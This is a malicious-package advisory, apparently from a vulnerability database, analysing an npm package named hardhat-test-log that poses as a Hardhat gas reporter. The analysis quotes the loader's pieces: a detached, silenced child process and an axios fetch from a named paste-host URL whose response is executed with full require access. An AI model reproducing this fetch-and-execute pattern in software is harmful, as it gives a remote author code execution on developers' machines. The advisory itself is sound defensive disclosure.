MAL-2026-6369

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (c8eaf29821b0a2792ecc08837bdd52a09bee062279d6c8c83f5f15855b1098f6) Package impersonates the legitimate hardhat-gas-reporter / eth-gas-reporter (README is a near-verbatim copy referencing eth-gas-reporter, but package.json name is hardhat-test-log). The exported reporter function in index.js sets `var opt = 1` and unconditionally takes the `else` branch, making the plausible Mocha-reporter implementation in the `if (!opt)` block dead code that exists only as cover. The reachable branch calls `utils.connectNet(...)` in lib/utils.js, which uses `child_process.spawn('node', [lib/syncResolve.js,...], { detached: true, stdio: ['ignore'] })` followed by `progs.unref()` to launch a detached, output-suppressed background process that survives the parent test runner. lib/syncResolve.js then performs `axios.get('https://www.jsonkeeper.com/b/NB36A', { headers: { 'x-secret-key': '_' } })`, reads `data.Cookie` from the response, and executes it via `new Function.constructor('require', result)(require)` — full remote code execution in the developer's Node process with access to `require`. jsonkeeper.com is an anonymous free JSON paste host whose content the author can mutate at any time, so any developer who installs this package and runs their Hardhat/Mocha test suite using this reporter will execute whatever JavaScript the author chooses to host there.